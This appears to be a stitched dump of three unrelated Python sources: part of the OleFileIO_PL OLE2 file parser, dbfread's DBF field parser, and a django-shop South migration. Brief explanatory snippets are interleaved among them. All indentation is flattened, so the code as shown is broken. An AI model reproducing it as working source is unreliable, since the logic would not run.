return _OleStream(self.ministream, start, size, 0,
self.minisectorsize, self.minifat,
self.ministream.size)
else:
# standard stream
return _OleStream(self.fp, start, size, 512,
self.sectorsize, self.fat, self._filesize)
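The FAT/MiniFAT choice in _open depends only on the stream size, the cutoff from the header (typically 4096 bytes) and the force_FAT flag; a sketch:

```python
def stream_location(size, mini_sector_cutoff=4096, force_FAT=False):
    # streams smaller than the cutoff live in the MiniStream/MiniFAT,
    # except when force_FAT is set (e.g. for the MiniStream itself)
    if size < mini_sector_cutoff and not force_FAT:
        return 'MiniFAT'
    return 'FAT'

print(stream_location(100))                  # MiniFAT
print(stream_location(100, force_FAT=True))  # FAT
print(stream_location(8192))                 # FAT
```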
def _list(self, files, prefix, node, streams=True, storages=False):
"""
(listdir helper)
files: list of files to fill in
prefix: current location in storage tree (list of names)
node: current node (_OleDirectoryEntry object)
streams: bool, include streams if True (True by default) - new in v0.26
storages: bool, include storages if True (False by default) - new in v0.26
(note: the root storage is never included)
"""
prefix = prefix + [node.name]
for entry in node.kids:
if entry.kids:
# this is a storage
if storages:
# add it to the list
files.append(prefix[1:] + [entry.name])
# check its kids
self._list(files, prefix, entry, streams, storages)
else:
# this is a stream
if streams:
# add it to the list
files.append(prefix[1:] + [entry.name])
def listdir(self, streams=True, storages=False):
"""
Return a list of streams stored in this file
streams: bool, include streams if True (True by default) - new in v0.26
storages: bool, include storages if True (False by default) - new in v0.26
(note: the root storage is never included)
"""
files = []
self._list(files, [], self.root, streams, storages)
return files
def _find(self, filename):
"""
Returns directory entry of given filename. (openstream helper)
Note: this method is case-insensitive.
filename: path of stream in storage tree (except root entry), either:
- a string using Unix path syntax, for example:
'storage_1/storage_1.2/stream'
- a list of storage filenames, path to the desired stream/storage.
Example: ['storage_1', 'storage_1.2', 'stream']
return: sid of requested filename
raise IOError if file not found
"""
# if filename is a string instead of a list, split it on slashes to
# convert to a list:
if isinstance(filename, basestring):
filename = filename.split('/')
# walk across storage tree, following given path:
node = self.root
for name in filename:
for kid in node.kids:
if kid.name.lower() == name.lower():
break
else:
raise IOError("file not found")
node = kid
return node.sid
def openstream(self, filename):
"""
Open a stream as a read-only file object (BytesIO).
filename: path of stream in storage tree (except root entry), either:
- a string using Unix path syntax, for example:
'storage_1/storage_1.2/stream'
- a list of storage filenames, path to the desired stream/storage.
Example: ['storage_1', 'storage_1.2', 'stream']
return: file object (read-only)
raise IOError if filename not found, or if this is not a stream.
"""
sid = self._find(filename)
entry = self.direntries[sid]
if entry.entry_type != STGTY_STREAM:
raise IOError("this file is not a stream")
return self._open(entry.isectStart, entry.size)
def get_type(self, filename):
"""
Test if given filename exists as a stream or a storage in the OLE
container, and return its type.
filename: path of stream in storage tree. (see openstream for syntax)
return: False if object does not exist, its entry type (>0) otherwise:
- STGTY_STREAM: a stream
- STGTY_STORAGE: a storage
- STGTY_ROOT: the root entry
"""
try:
sid = self._find(filename)
entry = self.direntries[sid]
return entry.entry_type
        except Exception:
return False
def getmtime(self, filename):
"""
Return modification time of a stream/storage.
filename: path of stream/storage in storage tree. (see openstream for
syntax)
return: None if modification time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
sid = self._find(filename)
entry = self.direntries[sid]
return entry.getmtime()
def getctime(self, filename):
"""
Return creation time of a stream/storage.
filename: path of stream/storage in storage tree. (see openstream for
syntax)
return: None if creation time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
sid = self._find(filename)
entry = self.direntries[sid]
return entry.getctime()
def exists(self, filename):
"""
Test if given filename exists as a stream or a storage in the OLE
container.
filename: path of stream in storage tree. (see openstream for syntax)
        return: True if the object exists, else False.
"""
try:
sid = self._find(filename)
return True
        except Exception:
return False
def get_size(self, filename):
"""
Return size of a stream in the OLE container, in bytes.
filename: path of stream in storage tree (see openstream for syntax)
return: size in bytes (long integer)
raise: IOError if file not found, TypeError if this is not a stream.
"""
sid = self._find(filename)
entry = self.direntries[sid]
if entry.entry_type != STGTY_STREAM:
#TODO: Should it return zero instead of raising an exception ?
raise TypeError('object is not an OLE stream')
return entry.size
def get_rootentry_name(self):
"""
        Return the root entry name: 'Root Entry' or 'R' in most
        implementations.
"""
return self.root.name
def getproperties(self, filename, convert_time=False, no_conversion=None):
"""
Return properties described in substream.
filename: path of stream in storage tree (see openstream for syntax)
convert_time: bool, if True timestamps will be converted to Python datetime
no_conversion: None or list of int, timestamps not to be converted
(for example total editing time is not a real timestamp)
return: a dictionary of values indexed by id (integer)
"""
# make sure no_conversion is a list, just to simplify code below:
        if no_conversion is None:
no_conversion = []
# stream path as a string to report exceptions:
streampath = filename
if not isinstance(streampath, str):
streampath = '/'.join(streampath)
fp = self.openstream(filename)
data = {}
try:
# header
s = fp.read(28)
clsid = _clsid(s[8:24])
# format id
s = fp.read(20)
fmtid = _clsid(s[:16])
fp.seek(i32(s, 16))
# get section
s = b"****" + fp.read(i32(fp.read(4))-4)
# number of properties:
num_props = i32(s, 4)
except BaseException as exc:
# catch exception while parsing property header, and only raise
# a DEFECT_INCORRECT then return an empty dict, because this is not
# a fatal error when parsing the whole file
msg = 'Error while parsing properties header in stream %s: %s' % (
repr(streampath), exc)
self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
return data
for i in range(num_props):
try:
id = 0 # just in case of an exception
id = i32(s, 8+i*8)
offset = i32(s, 12+i*8)
type = i32(s, offset)
debug ('property id=%d: type=%d offset=%X' % (id, type, offset))
# test for common types first (should perhaps use
# a dictionary instead?)
if type == VT_I2: # 16-bit signed integer
value = i16(s, offset+4)
if value >= 32768:
value = value - 65536
elif type == VT_UI2: # 2-byte unsigned integer
value = i16(s, offset+4)
elif type in (VT_I4, VT_INT, VT_ERROR):
# VT_I4: 32-bit signed integer
# VT_ERROR: HRESULT, similar to 32-bit signed integer,
# see http://msdn.microsoft.com/en-us/library/cc230330.aspx
value = i32(s, offset+4)
elif type in (VT_UI4, VT_UINT): # 4-byte unsigned integer
value = i32(s, offset+4) # FIXME
elif type in (VT_BSTR, VT_LPSTR):
# CodePageString, see http://msdn.microsoft.com/en-us/library/dd942354.aspx
# size is a 32-bit integer, including the null terminator, and
# possibly trailing or embedded null chars
#TODO: if codepage is unicode, the string should be converted as such
count = i32(s, offset+4)
value = s[offset+8:offset+8+count-1]
# remove all null chars:
value = value.replace(b'\x00', b'')
elif type == VT_BLOB:
# binary large object (BLOB)
# see http://msdn.microsoft.com/en-us/library/dd942282.aspx
count = i32(s, offset+4)
value = s[offset+8:offset+8+count]
elif type == VT_LPWSTR:
# UnicodeString
# see http://msdn.microsoft.com/en-us/library/dd942313.aspx
# "the string should NOT contain embedded or additional trailing
# null characters."
count = i32(s, offset+4)
value = _unicode(s[offset+8:offset+8+count*2])
elif type == VT_FILETIME:
value = long(i32(s, offset+4)) + (long(i32(s, offset+8))<<32)
# FILETIME is a 64-bit int: "number of 100ns periods
# since Jan 1,1601".
if convert_time and id not in no_conversion:
debug('Converting property #%d to python datetime, value=%d=%fs'
%(id, value, float(value)/10000000))
# convert FILETIME to Python datetime.datetime
# inspired from http://code.activestate.com/recipes/511425-filetime-to-datetime/
_FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
debug('timedelta days=%d' % (value//(10*1000000*3600*24)))
value = _FILETIME_null_date + datetime.timedelta(microseconds=value//10)
else:
# legacy code kept for backward compatibility: returns a
# number of seconds since Jan 1,1601
value = value // 10000000 # seconds
elif type == VT_UI1: # 1-byte unsigned integer
value = i8(s[offset+4])
elif type == VT_CLSID:
value = _clsid(s[offset+4:offset+20])
elif type == VT_CF:
# PropertyIdentifier or ClipboardData??
# see http://msdn.microsoft.com/en-us/library/dd941945.aspx
count = i32(s, offset+4)
value = s[offset+8:offset+8+count]
elif type == VT_BOOL:
# VARIANT_BOOL, 16-bit bool, 0x0000=False, 0xFFFF=True
# see http://msdn.microsoft.com/en-us/library/cc237864.aspx
value = bool(i16(s, offset+4))
else:
value = None # everything else yields "None"
debug ('property id=%d: type=%d not implemented in parser yet' % (id, type))
# missing: VT_EMPTY, VT_NULL, VT_R4, VT_R8, VT_CY, VT_DATE,
# VT_DECIMAL, VT_I1, VT_I8, VT_UI8,
# see http://msdn.microsoft.com/en-us/library/dd942033.aspx
# FIXME: add support for VT_VECTOR
# VT_VECTOR is a 32-bit uint giving the number of items, followed by
# the items in sequence. The VT_VECTOR value is combined with the
# type of items, e.g. VT_VECTOR|VT_BSTR
# see http://msdn.microsoft.com/en-us/library/dd942011.aspx
#print("%08x" % id, repr(value), end=" ")
#print("(%s)" % VT[i32(s, offset) & 0xFFF])
data[id] = value
except BaseException as exc:
# catch exception while parsing each property, and only raise
# a DEFECT_INCORRECT, because parsing can go on
msg = 'Error while parsing property id %d in stream %s: %s' % (
id, repr(streampath), exc)
self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
return data
def get_metadata(self):
"""
Parse standard properties streams, return an OleMetadata object
containing all the available metadata.
(also stored in the metadata attribute of the OleFileIO object)
new in version 0.25
"""
self.metadata = OleMetadata()
self.metadata.parse_properties(self)
return self.metadata
#
# --------------------------------------------------------------------
# This script can be used to dump the directory of any OLE2 structured
# storage file.
if __name__ == "__main__":
import sys
# [PL] display quick usage info if launched from command-line
if len(sys.argv) <= 1:
print(__doc__)
print("""
Launched from command line, this script parses OLE files and prints info.
Usage: OleFileIO_PL.py [-d] [-c] <file> [file2 ...]
Options:
-d : debug mode (display a lot of debug information, for developers only)
-c : check all streams (for debugging purposes)
""")
sys.exit()
check_streams = False
for filename in sys.argv[1:]:
## try:
# OPTIONS:
if filename == '-d':
# option to switch debug mode on:
set_debug_mode(True)
continue
if filename == '-c':
# option to switch check streams mode on:
check_streams = True
continue
ole = OleFileIO(filename)#, raise_defects=DEFECT_INCORRECT)
print("-" * 68)
print(filename)
print("-" * 68)
ole.dumpdirectory()
for streamname in ole.listdir():
if streamname[-1][0] == "\005":
print(streamname, ": properties")
props = ole.getproperties(streamname, convert_time=True)
props = sorted(props.items())
for k, v in props:
#[PL]: avoid to display too large or binary values:
if isinstance(v, (basestring, bytes)):
if len(v) > 50:
v = v[:50]
if isinstance(v, bytes):
# quick and dirty binary check:
for c in (1,2,3,4,5,6,7,11,12,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,31):
if c in bytearray(v):
v = '(binary data)'
break
print(" ", k, v)
if check_streams:
# Read all streams to check if there are errors:
print('\nChecking streams...')
for streamname in ole.listdir():
# print name using repr() to convert binary chars to \xNN:
print('-', repr('/'.join(streamname)),'-', end=' ')
st_type = ole.get_type(streamname)
if st_type == STGTY_STREAM:
print('size %d' % ole.get_size(streamname))
# just try to read stream in memory:
ole.openstream(streamname)
else:
print('NOT a stream : type=%d' % st_type)
print()
## for streamname in ole.listdir():
## # print name using repr() to convert binary chars to \xNN:
## print('-', repr('/'.join(streamname)),'-', end=' ')
## print(ole.getmtime(streamname))
## print()
print('Modification/Creation times of all directory entries:')
for entry in ole.direntries:
if entry is not None:
print('- %s: mtime=%s ctime=%s' % (entry.name,
entry.getmtime(), entry.getctime()))
print()
# parse and display metadata:
meta = ole.get_metadata()
meta.dump()
print()
#[PL] Test a few new methods:
root = ole.get_rootentry_name()
print('Root entry name: "%s"' % root)
if ole.exists('worddocument'):
print("This is a Word document.")
print("type of stream 'WordDocument':", ole.get_type('worddocument'))
print("size :", ole.get_size('worddocument'))
if ole.exists('macros/vba'):
print("This document may contain VBA macros.")
# print parsing issues:
print('\nNon-fatal issues raised during parsing:')
if ole.parsing_issues:
for exctype, msg in ole.parsing_issues:
print('- %s: %s' % (exctype.__name__, msg))
else:
print('None')
## except IOError as v:
## print("***", "cannot read", file, "-", v)
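The VT_FILETIME branch of getproperties() above turns a 64-bit FILETIME (100-nanosecond ticks since 1601-01-01 UTC) into a datetime. A minimal standalone sketch of that conversion, assuming the same epoch and tick size; the helper name is illustrative and not part of the OleFileIO_PL API:

```python
import datetime

# FILETIME epoch: January 1, 1601 (UTC), as used by getproperties() above.
_FILETIME_EPOCH = datetime.datetime(1601, 1, 1)

def filetime_to_datetime(ticks):
    """Convert 100 ns ticks since 1601-01-01 to a naive UTC datetime."""
    # One tick is 100 ns = 1/10 microsecond, hence the integer division by 10.
    return _FILETIME_EPOCH + datetime.timedelta(microseconds=ticks // 10)

# One full day is 24 * 3600 * 10**7 ticks:
assert filetime_to_datetime(864000000000) == datetime.datetime(1601, 1, 2)
```

The well-known offset between the FILETIME epoch and the Unix epoch, 116444736000000000 ticks, makes a handy sanity check for this kind of converter.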
| mit |
awangga/csvfromdbf | dbfread/field_parser.py | 5 | 8156 | """
Parser for DBF fields.
"""
import sys
import datetime
import struct
from decimal import Decimal
from .memo import BinaryMemo
PY2 = sys.version_info[0] == 2
if PY2:
decode_text = unicode
else:
decode_text = str
class InvalidValue(bytes):
def __repr__(self):
text = bytes.__repr__(self)
if PY2:
# Make sure the string starts with "b'" in
# "InvalidValue(b'value here')".
text = 'b' + text
return 'InvalidValue({})'.format(text)
class FieldParser:
def __init__(self, table, memofile=None):
"""Create a new field parser
encoding is the character encoding to use when parsing
strings."""
self.table = table
self.dbversion = self.table.header.dbversion
self.encoding = table.encoding
self._lookup = self._create_lookup_table()
if memofile:
self.get_memo = memofile.__getitem__
else:
self.get_memo = lambda x: None
def _create_lookup_table(self):
"""Create a lookup table for field types."""
lookup = {}
for name in dir(self):
if name.startswith('parse'):
field_type = name[5:]
if len(field_type) == 1:
lookup[field_type] = getattr(self, name)
elif len(field_type) == 2:
# Hexadecimal ASCII code for field name.
# Example: parse2B() ('+' field)
field_type = chr(int(field_type, 16))
lookup[field_type] = getattr(self, name)
return lookup
def field_type_supported(self, field_type):
"""Checks if the field_type is supported by the parser
field_type should be a one-character string like 'C' or 'N'.
Returns a boolean which is True if the field type is supported.
"""
return field_type in self._lookup
def parse(self, field, data):
"""Parse field and return value"""
try:
func = self._lookup[field.type]
except KeyError:
raise ValueError('Unknown field type: {!r}'.format(field.type))
else:
return func(field, data)
def parse0(self, field, data):
"""Parse flags field and return as byte string"""
return data
def parseC(self, field, data):
"""Parse char field and return unicode string"""
return decode_text(data.rstrip(b'\0 '), self.encoding)
def parseD(self, field, data):
"""Parse date field and return datetime.date or None"""
try:
return datetime.date(int(data[:4]), int(data[4:6]), int(data[6:8]))
except ValueError:
if data.strip(b' 0') == b'':
# A record containing only spaces and/or zeros is
# a NULL value.
return None
else:
raise ValueError('invalid date {!r}'.format(data))
def parseF(self, field, data):
"""Parse float field and return float or None"""
if data.strip():
return float(data)
else:
return None
def parseI(self, field, data):
"""Parse integer or autoincrement field and return int."""
# Todo: is this 4 bytes on every platform?
return struct.unpack('<i', data)[0]
def parseL(self, field, data):
"""Parse logical field and return True, False or None"""
if data in b'TtYy':
return True
elif data in b'FfNn':
return False
elif data in b'? ':
return None
else:
# Todo: return something? (But that would be misleading!)
message = 'Illegal value for logical field: {!r}'
raise ValueError(message.format(data))
def _parse_memo_index(self, data):
if len(data) == 4:
return struct.unpack('<I', data)[0]
else:
try:
return int(data)
except ValueError:
if data.strip(b' \x00') == b'':
return 0
else:
raise ValueError(
'Memo index is not an integer: {!r}'.format(data))
def parseM(self, field, data):
"""Parse memo field (M, G, B or P)
Returns memo index (an integer), which can be used to look up
the corresponding memo in the memo file.
"""
memo = self.get_memo(self._parse_memo_index(data))
# Visual FoxPro allows binary data in memo fields.
# These should not be decoded as string.
if isinstance(memo, BinaryMemo):
return memo
else:
if memo is None:
return None
else:
return memo.decode(self.encoding)
def parseN(self, field, data):
"""Parse numeric field (N)
Returns int, float or None if the field is empty.
"""
try:
return int(data)
except ValueError:
if not data.strip():
return None
else:
# Account for , in numeric fields
return float(data.replace(b',', b'.'))
def parseO(self, field, data):
"""Parse long field (O) and return float."""
return struct.unpack('d', data)[0]
def parseT(self, field, data):
"""Parse time field (T)
Returns datetime.datetime or None"""
# Julian day (32-bit little endian)
# Milliseconds since midnight (32-bit little endian)
#
# "The Julian day or Julian day number (JDN) is the number of days
# that have elapsed since 12 noon Greenwich Mean Time (UT or TT) on
# Monday, January 1, 4713 BC in the proleptic Julian calendar
# 1. That day is counted as Julian day zero. The Julian day system
# was intended to provide astronomers with a single system of dates
# that could be used when working with different calendars and to
# unify different historical chronologies." - wikipedia.org
# Offset from julian days (used in the file) to proleptic Gregorian
# ordinals (used by the datetime module)
offset = 1721425 # Todo: will this work?
if data.strip():
# Note: if the day number is 0, we return None
# I've seen data where the day number is 0 and
# msec is 2 or 4. I think we can safely return None for those.
# (At least I hope so.)
#
day, msec = struct.unpack('<LL', data)
if day:
dt = datetime.datetime.fromordinal(day - offset)
delta = datetime.timedelta(seconds=msec/1000)
return dt + delta
else:
return None
else:
return None
def parseY(self, field, data):
"""Parse currency field (Y) and return decimal.Decimal.
The field is encoded as a 8-byte little endian integer
with 4 digits of precision."""
value = struct.unpack('<q', data)[0]
# Currency fields are stored with 4 points of precision
return Decimal(value) / 10000
def parseB(self, field, data):
"""Binary memo field or double precision floating point number
dBase uses B to represent a memo index (10 bytes), while
Visual FoxPro uses it to store a double precision floating
point number (8 bytes).
"""
if self.dbversion in [0x30, 0x31, 0x32]:
return struct.unpack('d', data)[0]
else:
return self.get_memo(self._parse_memo_index(data))
def parseG(self, field, data):
"""OLE Object stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
def parseP(self, field, data):
"""Picture stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
# Autoincrement field ('+')
parse2B = parseI
# Timestamp field ('@')
parse40 = parseT
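FieldParser._create_lookup_table() above builds its dispatch table by reflection: any method named parseX handles field type 'X', and a two-character suffix is the hexadecimal ASCII code of the type character (so parse2B handles '+'). A self-contained sketch of that pattern, with hypothetical field handlers rather than the real dbfread ones:

```python
class MiniParser:
    def __init__(self):
        # Scan our own methods for parseX names, exactly like
        # FieldParser._create_lookup_table() does.
        self._lookup = {}
        for name in dir(self):
            if name.startswith('parse'):
                field_type = name[5:]
                if len(field_type) == 1:
                    self._lookup[field_type] = getattr(self, name)
                elif len(field_type) == 2:
                    # Two hex digits are the ASCII code of the type char.
                    self._lookup[chr(int(field_type, 16))] = getattr(self, name)

    def parse(self, field_type, data):
        return self._lookup[field_type](data)

    def parseC(self, data):          # 'C': character field
        return data.strip()

    def parse2B(self, data):         # 0x2B == '+': autoincrement field
        return int(data)

p = MiniParser()
assert p.parse('C', '  hello ') == 'hello'
assert p.parse('+', '42') == 42
```

The hex-suffix trick exists because characters like '+' and '@' cannot appear in Python method names.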
| agpl-3.0 |
thenewguy/django-shop | shop/migrations/0003_auto__del_country__del_address__del_client.py | 16 | 13300 | # flake8: noqa
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Country'
db.delete_table('shop_country')
# Deleting model 'Address'
db.delete_table('shop_address')
# Deleting model 'Client'
db.delete_table('shop_client')
def backwards(self, orm):
# Adding model 'Country'
db.create_table('shop_country', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('shop', ['Country'])
# Adding model 'Address'
db.create_table('shop_address', (
('address2', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('address', self.gf('django.db.models.fields.CharField')(max_length=255)),
('is_shipping', self.gf('django.db.models.fields.BooleanField')(default=False)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('city', self.gf('django.db.models.fields.CharField')(max_length=20)),
('country', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shop.Country'])),
('client', self.gf('django.db.models.fields.related.ForeignKey')(related_name='addresses', to=orm['shop.Client'])),
('state', self.gf('django.db.models.fields.CharField')(max_length=255)),
('is_billing', self.gf('django.db.models.fields.BooleanField')(default=False)),
('zip_code', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal('shop', ['Address'])
# Adding model 'Client'
db.create_table('shop_client', (
('date_of_birth', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('user', self.gf('django.db.models.fields.related.OneToOneField')(related_name='client', unique=True, to=orm['auth.User'])),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
))
db.send_create_signal('shop', ['Client'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shop.cart': {
'Meta': {'object_name': 'Cart'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'shop.cartitem': {
'Meta': {'object_name': 'CartItem'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {})
},
'shop.extraorderitempricefield': {
'Meta': {'object_name': 'ExtraOrderItemPriceField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.OrderItem']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.extraorderpricefield': {
'Meta': {'object_name': 'ExtraOrderPriceField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Order']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.order': {
'Meta': {'object_name': 'Order'},
'billing_address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_address2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'order_subtotal': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'order_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'payment_method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_address2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'shop.orderextrainfo': {
'Meta': {'object_name': 'OrderExtraInfo'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'extra_info'", 'to': "orm['shop.Order']"}),
'text': ('django.db.models.fields.TextField', [], {})
},
'shop.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_subtotal': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'line_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Order']"}),
'product_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'product_reference': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'quantity': ('django.db.models.fields.IntegerField', [], {}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.orderpayment': {
'Meta': {'object_name': 'OrderPayment'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Order']"}),
'payment_method': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'shop.product': {
'Meta': {'object_name': 'Product'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_shop.product_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
}
}
complete_apps = ['shop']
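The forwards()/backwards() pair in a migration like the one above must be exact mirrors: whatever forwards() deletes, backwards() recreates. A runnable sketch of that contract using a dict-backed stand-in for South's db object (FakeDB and the column list are invented for illustration, not South API):

```python
class FakeDB:
    """Toy schema store standing in for south.db.db."""
    def __init__(self):
        self.tables = {}
    def create_table(self, name, columns):
        self.tables[name] = columns
    def delete_table(self, name):
        del self.tables[name]

class Migration:
    def forwards(self, db):
        # Deleting model 'Country'
        db.delete_table('shop_country')
    def backwards(self, db):
        # Re-adding model 'Country': recreate exactly what forwards removed.
        db.create_table('shop_country', ['id', 'name'])

db = FakeDB()
db.create_table('shop_country', ['id', 'name'])
Migration().forwards(db)
assert 'shop_country' not in db.tables
Migration().backwards(db)
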